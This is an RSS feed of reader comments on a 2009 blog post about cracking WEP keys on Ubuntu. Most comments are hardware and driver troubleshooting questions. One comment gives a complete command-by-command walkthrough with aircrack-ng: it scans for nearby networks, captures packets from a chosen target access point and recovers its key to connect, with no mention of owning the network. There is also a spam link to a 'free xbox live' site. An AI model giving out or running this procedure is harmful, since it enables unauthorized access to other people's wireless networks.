<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: How to crack a WEP key using Ubuntu</title>
	<atom:link href="http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/</link>
	<description>College Student Portal</description>
	<lastBuildDate>Sat, 21 Nov 2009 01:06:48 -0700</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.3</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: TenGees</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77305</link>
		<dc:creator>TenGees</dc:creator>
		<pubDate>Wed, 11 Nov 2009 17:22:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77305</guid>
		<description>Do you think this will work for me? I know my WEP password and can&#039;t connect with ubuntu! Ubuntu wireless configuration tools are useless IMHO. I enter a passphrase and the dialog comes back asking for it, with a different passphrase entered... junk!</description>
		<content:encoded><![CDATA[<p>Do you think this will work for me? I know my WEP password and can&#8217;t connect with ubuntu! Ubuntu wireless configuration tools are useless IMHO. I enter a passphrase and the dialog comes back asking for it, with a different passphrase entered&#8230; junk!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kevin</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77195</link>
		<dc:creator>Kevin</dc:creator>
		<pubDate>Fri, 23 Oct 2009 21:00:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77195</guid>
		<description>what card do you have? cuz i have both a wusb54gc linksys and a wpc11v3 linksys and when i run vmware player in windows for backtrack 3 it works but when i boot ubuntu it only lets me use the actual wifi network card

i got the same thing when i tried to start my wifi usb so i use my external network card</description>
		<content:encoded><![CDATA[<p>what card do you have? cuz i have both a wusb54gc linksys and a wpc11v3 linksys and when i run vmware player in windows for backtrack 3 it works but when i boot ubuntu it only lets me use the actual wifi network card</p>
<p>i got the same thing when i tried to start my wifi usb so i use my external network card</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kevin</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77194</link>
		<dc:creator>Kevin</dc:creator>
		<pubDate>Fri, 23 Oct 2009 20:56:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77194</guid>
		<description>yes  type in sudo apt-get install aircrack-ng

this should get it

sudo is to run things pretty much as a administrator</description>
		<content:encoded><![CDATA[<p>yes  type in sudo apt-get install aircrack-ng</p>
<p>this should get it</p>
<p>sudo is to run things pretty much as a administrator</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kevin</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77193</link>
		<dc:creator>Kevin</dc:creator>
		<pubDate>Fri, 23 Oct 2009 20:52:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77193</guid>
		<description>yes there is a program or rather OS called backtrack which has all these programs installed.  I personally use Ubuntu as my linux OS distro.  now if you have Ubuntu what you have to do is open a terminal (shell) and type: sudo -i, what this does is make it so all your commands run on root (enter your password for your login when it asks for it after typing sudo -i

next type:
 apt-get install aircrack-ng

what this does is install the aircrack suite (includes airmon-ng, airodump-ng, aircrack-ng, aireplay-ng, airtun-ng, and not sure what else).

after that is done installing type: airmon-ng

this shows all the wireless interface cards you have connected to your computer
pick one you want to use and type : airmon-ng start *your chosen interface* --mine is eth2

next type: airodump-ng *your chosen interface*
this will start scanning your surroundings for a network to crack.  It will include all the info like the bssid, essid, channel, how many packets, how close you are to the access point.

chose an access point that has alot of packets coming in (and make sure it is WEP)

open a new terminal by pressing: ctrl+shift+N

type: airodump-ng -w *any file name you want* --bssid *the MAC address of the network your going to hack* -c *the channel of that network* *and your chosen interface*

example: airodump-ng -w passcode --bssid 00:11:22:33:44:55 -c 9 eth2

with any luck it will start collecting packets and save it in a file called passcode (or whatever you put) .cap

after it has collected at least 5000 packets open a new terminal 
and type in: dir

this shows what is in the folder... your looking for yourfilenameyouchose-01.cap
highlight and copy this by double clicking it in the terminal and right-clicking

next type: aircrack-ng -a 1 -b *mac address your cracking* yourfilenameyouchose-01.cap
example: aircrack-ng -a 1 -b 00:11:22:33:44:55 passcode-01.cap

hit enter and if you have enough packets it should say key found... take that key and try connecting to the access point you cracked... when it asks for the key just type that key you just got into the the text box... if you followed this it should work for you on ubuntu... you can email me at vampyyri1123@hotmail.com if you have any questions</description>
		<content:encoded><![CDATA[<p>yes there is a program or rather OS called backtrack which has all these programs installed.  I personally use Ubuntu as my linux OS distro.  now if you have Ubuntu what you have to do is open a terminal (shell) and type: sudo -i, what this does is make it so all your commands run on root (enter your password for your login when it asks for it after typing sudo -i</p>
<p>next type:<br />
 apt-get install aircrack-ng</p>
<p>what this does is install the aircrack suite (includes airmon-ng, airodump-ng, aircrack-ng, aireplay-ng, airtun-ng, and not sure what else).</p>
<p>after that is done installing type: airmon-ng</p>
<p>this shows all the wireless interface cards you have connected to your computer<br />
pick one you want to use and type : airmon-ng start *your chosen interface* &#8211;mine is eth2</p>
<p>next type: airodump-ng *your chosen interface*<br />
this will start scanning your surroundings for a network to crack.  It will include all the info like the bssid, essid, channel, how many packets, how close you are to the access point.</p>
<p>chose an access point that has alot of packets coming in (and make sure it is WEP)</p>
<p>open a new terminal by pressing: ctrl+shift+N</p>
<p>type: airodump-ng -w *any file name you want* &#8211;bssid *the MAC address of the network your going to hack* -c *the channel of that network* *and your chosen interface*</p>
<p>example: airodump-ng -w passcode &#8211;bssid 00:11:22:33:44:55 -c 9 eth2</p>
<p>with any luck it will start collecting packets and save it in a file called passcode (or whatever you put) .cap</p>
<p>after it has collected at least 5000 packets open a new terminal<br />
and type in: dir</p>
<p>this shows what is in the folder&#8230; your looking for yourfilenameyouchose-01.cap<br />
highlight and copy this by double clicking it in the terminal and right-clicking</p>
<p>next type: aircrack-ng -a 1 -b *mac address your cracking* yourfilenameyouchose-01.cap<br />
example: aircrack-ng -a 1 -b 00:11:22:33:44:55 passcode-01.cap</p>
<p>hit enter and if you have enough packets it should say key found&#8230; take that key and try connecting to the access point you cracked&#8230; when it asks for the key just type that key you just got into the the text box&#8230; if you followed this it should work for you on ubuntu&#8230; you can email me at <a href="mailto:vampyyri1123@hotmail.com">vampyyri1123@hotmail.com</a> if you have any questions</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: XoзяинДьявoлa</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77164</link>
		<dc:creator>XoзяинДьявoлa</dc:creator>
		<pubDate>Sun, 18 Oct 2009 12:33:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77164</guid>
		<description>Сорри за оффтоп, не подскажете, где мона такой же симпатичный шаблон для блога взять?</description>
		<content:encoded><![CDATA[<p>Сорри за оффтоп, не подскажете, где мона такой же симпатичный шаблон для блога взять?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: alberto</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-77033</link>
		<dc:creator>alberto</dc:creator>
		<pubDate>Sat, 26 Sep 2009 09:41:59 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-77033</guid>
		<description>ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run &#039;airmon-ng start eth1 &#039;
Sysfs injection support was not found either.

THIS IS WHAT I GET WHEN I DO THE AIRODUMP-NG 
PLEASE HELP

AND THE LINK IS THE DOWN TO THE PATCH</description>
		<content:encoded><![CDATA[<p>ARP linktype is set to 1 (Ethernet) &#8211; expected ARPHRD_IEEE80211,<br />
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make<br />
sure RFMON is enabled: run &#8216;airmon-ng start eth1 &#8216;<br />
Sysfs injection support was not found either.</p>
<p>THIS IS WHAT I GET WHEN I DO THE AIRODUMP-NG<br />
PLEASE HELP</p>
<p>AND THE LINK IS THE DOWN TO THE PATCH</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kris</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-76890</link>
		<dc:creator>Kris</dc:creator>
		<pubDate>Mon, 31 Aug 2009 02:38:19 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-76890</guid>
		<description>Want to get free xbox live? Go to http://www.myfreexboxlive.com/</description>
		<content:encoded><![CDATA[<p>Want to get free xbox live? Go to <a href="http://www.myfreexboxlive.com/" rel="nofollow">http://www.myfreexboxlive.com/</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: paet</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-76585</link>
		<dc:creator>paet</dc:creator>
		<pubDate>Mon, 27 Jul 2009 10:28:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-76585</guid>
		<description>err you guys...
for the people having trouble with anything to do with &#039;ath&#039; related commands is probably cus you dont have an atheros wireless card.... pneumetic... and stuff... srsly you guise :S</description>
		<content:encoded><![CDATA[<p>err you guys&#8230;<br />
for the people having trouble with anything to do with &#8216;ath&#8217; related commands is probably cus you dont have an atheros wireless card&#8230;. pneumetic&#8230; and stuff&#8230; srsly you guise :S</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sathish</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-76044</link>
		<dc:creator>Sathish</dc:creator>
		<pubDate>Fri, 01 May 2009 15:17:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-76044</guid>
		<description>Hi thanks for this tutorial..its an excellent tutorial but unfortunately i have some problem..and i couldn&#039;t get the WEP key..here is my ethernet controller details..does it support aircrack-ng 
05:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8039 PCI-E Fast Ethernet Controller (rev 14)
07:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)</description>
		<content:encoded><![CDATA[<p>Hi thanks for this tutorial..its an excellent tutorial but unfortunately i have some problem..and i couldn&#8217;t get the WEP key..here is my ethernet controller details..does it support aircrack-ng<br />
05:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8039 PCI-E Fast Ethernet Controller (rev 14)<br />
07:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: omid</title>
		<link>http://www.askstudent.com/hacking/how-to-crack-a-wep-key-using-ubuntu/comment-page-1/#comment-75873</link>
		<dc:creator>omid</dc:creator>
		<pubDate>Sat, 11 Apr 2009 17:58:39 +0000</pubDate>
		<guid isPermaLink="false">http://www.askstudent.com/2006/10/20/how-to-crack-a-wep-key-using-ubuntu/#comment-75873</guid>
		<description>hey people i need urgent help with ipw2100 3b driver.i couldnt find any patch for that ,can someone help me,im also new too linux
thanks</description>
		<content:encoded><![CDATA[<p>hey people i need urgent help with ipw2100 3b driver.i couldnt find any patch for that ,can someone help me,im also new too linux<br />
thanks</p>
]]></content:encoded>
	</item>
</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.889 seconds -->
